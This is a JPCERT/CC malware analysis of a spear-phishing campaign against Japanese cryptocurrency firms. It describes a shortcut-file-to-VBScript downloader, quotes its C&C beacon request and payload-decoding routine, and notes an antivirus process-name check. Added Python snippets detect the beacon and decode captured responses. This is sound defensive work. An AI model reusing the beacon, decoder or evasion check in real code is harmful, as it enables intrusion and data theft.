Spear Phishing against Cryptocurrency Businesses
As of June 2019, JPCERT/CC has observed targeted emails sent to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article describes the details of the attack method.
How the VBScript downloader is launched
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, which run when the file is executed. The image below illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
The shortcut file contains the following command:
When a user accesses the shortened URL, they will be redirected to the following site, and an HTML file containing the VBScript (Figure 2) is downloaded.
The behaviour of the VBScript is described in Figure 3. First, it creates and displays a text file that contains the password for the decoy document. Then, it creates a VBS file (oezjrjua.vbs) in the %TEMP% directory and executes it. It also lists the processes running in the environment and checks whether any of them contains specific strings ("hudongf" or "qhsafe"). If neither string is found, a shortcut file (xBoxOne.lnk) is created in the Startup folder. It is assumed that this check is meant to detect strings contained in the process names of Qihoo 360 security products (zhudongfangyu.exe, qhsafemain.exe).
Details of xBoxOne.lnk
xBoxOne.lnk is a shortcut file and contains the following command:
When a user accesses the shortened URL, they will be redirected to the following site:
This shortcut file is created in the Startup folder and is executed when the user logs in. As of 26 June 2019, JPCERT/CC was not able to confirm the details of the site as the hostname could not be resolved.
Details of oezjrjua.vbs
oezjrjua.vbs is a downloader which sends a POST request every 3 minutes and executes the received data as VBScript. The following is an example of the request.
POST /open?topics=s9[random 3-digit numeric] HTTP/1.1
Accept: */*
Accept-Language: ja
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 126.96.36.199:8080
Content-Length: 7426
Connection: Keep-Alive
Cache-Control: no-cache

200
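The request pattern above can be hunted for in proxy logs. The following is an added example, not part of the original article or the malware: it flags clients that POST to /open?topics=s9 plus three digits at roughly 3-minute intervals. The log layout, field order and all addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed proxy log lines (timestamp, client, method, URL); not real traffic.
SAMPLE_LOG = """\
2019-06-20T09:00:02 10.0.0.15 POST http://192.0.2.10:8080/open?topics=s9412
2019-06-20T09:01:10 10.0.0.22 GET http://intranet.example/open?topics=news
2019-06-20T09:03:03 10.0.0.15 POST http://192.0.2.10:8080/open?topics=s9077
2019-06-20T09:06:01 10.0.0.15 POST http://192.0.2.10:8080/open?topics=s9630
2019-06-20T09:09:04 10.0.0.15 POST http://192.0.2.10:8080/open?topics=s9158
2019-06-20T09:10:00 10.0.0.31 POST http://198.51.100.7/open?topics=s9123
"""

# Request line from the article: POST /open?topics=s9 + three random digits.
BEACON_URL = re.compile(r"^https?://([^/\s]+)/open\?topics=s9\d{3}$")


def find_beacons(log_text, period=180, tolerance=15, min_hits=3):
    """Return {(client, host): median_interval_seconds} for clients that POST
    the beacon URL to one host at roughly `period` seconds apart."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "POST":
            continue
        match = BEACON_URL.match(parts[3])
        if match:
            hits[(parts[1], match.group(1))].append(datetime.fromisoformat(parts[0]))
    flagged = {}
    for pair, times in hits.items():
        if len(times) < min_hits:
            continue  # one matching request alone is weak evidence
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mid = median(gaps)
        if abs(mid - period) <= tolerance:
            flagged[pair] = mid
    return flagged


if __name__ == "__main__":
    for (client, host), interval in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: median interval {interval:.0f}s")
```

Clients with fewer than three matching requests are not flagged by the interval check, so a single match on the URL pattern should still be reviewed by hand.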
Details of VBScript downloaded by oezjrjua.vbs
JPCERT/CC has confirmed that the VBScript (Figure 4) is received and executed in response to the POST request from oezjrjua.vbs.
The executed VBScript collects information about the infected device and sends it to the attacker’s server every minute. The following information is sent:
- Host name
- OS version
- OS install date
- OS run time
- Time zone
- CPU name
- Execution path of oezjrjua.vbs
- Network adapter information
- List of running processes
If the response to the data contains “20”, encoded data will be downloaded. It can be decoded with the following code:
n=InStr(1,res,"#") ' Finds # in the response
key=CLng("&h" & Mid(res,1,n-1)) ' Extracts the key
psc=Mid(res,n+1,Len(res)-n) ' Extracts encoded data
sc=base64dec(psc) ' Base64 decoding (1st time)
psc=CStr(xor(sc,key)) ' XOR processing with the key
NStep=base64dec(psc) ' Base64 decoding (2nd time)
The decoded data is expected to be VBScript, and it will be executed when it is correctly decoded. As of now, we do not know what kind of malware will be downloaded as a result, since the encoded data is not accessible. It is assumed that attackers would inject some malicious files according to the victim’s environment information.
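For analysts who capture such a response, the decoding steps above can be reproduced offline. The following is an added example, not code from the original article or from the malware: it returns the decoded text for review and never executes it. The article does not show the xor() routine, so applying the key to every byte after reducing it to 8 bits is an assumption, and the sample response is constructed.

```python
import base64
import binascii

# Constructed sample in the format the article describes: "<hex key>#<data>".
# It wraps the harmless text "x = 1"; it is not a captured C&C response.
SAMPLE_RESPONSE = "1f#elxeJlZbWiI="


def decode_response(res):
    """Reverse the encoding described in the article: base64, XOR, base64.

    Assumption: xor() is not shown in the article, so the key is applied to
    every byte after reduction to 8 bits (key & 0xFF).
    Returns the decoded text, or None if the response is not in this format.
    """
    key_hex, sep, encoded = res.partition("#")
    if not sep or not key_hex or not encoded:
        return None  # no "#" separator, or an empty key or data part
    try:
        key = int(key_hex, 16) & 0xFF                       # hex key before "#"
        stage1 = base64.b64decode(encoded, validate=True)   # base64, 1st time
        stage2 = bytes(b ^ key for b in stage1)             # XOR with the key
        plain = base64.b64decode(stage2, validate=True)     # base64, 2nd time
    except (ValueError, binascii.Error):
        # Bad hex key, or a stage that is not valid base64 (e.g. wrong key).
        return None
    return plain.decode("latin-1")


if __name__ == "__main__":
    print(decode_response(SAMPLE_RESPONSE))
```

A wrong key usually turns the intermediate data into invalid base64, so a None result on a captured response suggests the XOR assumption does not match that variant.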
Access to the shortened URL
JPCERT/CC observed a limited number of accesses to the shortened URL (Figure 5). This implies that the attack was conducted against a very limited range of targets.
In this series of attacks, we have observed that attackers change some parts of the encoding and conditions for each attempt. It is likely that this type of attack will continue with some customisation. Details about the shortcut file are available in Appendix A, the list of samples in Appendix B and the C&C servers in Appendix C.
The hash values and C&C servers of some variants are listed in Appendix D and E. Please make sure that none of your devices is communicating with the C&C servers listed in Appendix C or E. These samples were mostly decoy documents with subjects about cryptocurrency. We are aware that some of these documents have been sent to organisations that are related to cryptocurrencies. We assume that this attack campaign specifically targets cryptocurrency operators and related entities.
(Translated by Yukako Uchida)
Appendix A Shortcut file information
Drive serial number: fe42-66e0
Drive serial number: 1aee-e0bd
Appendix B SHA-256 Hash value of the samples
Appendix C List of C&C servers
Appendix D SHA-256 Hash value of the similar samples
Update: Nov 20, 2019
Appendix E C&C servers of the similar samples
Update: Nov 20, 2019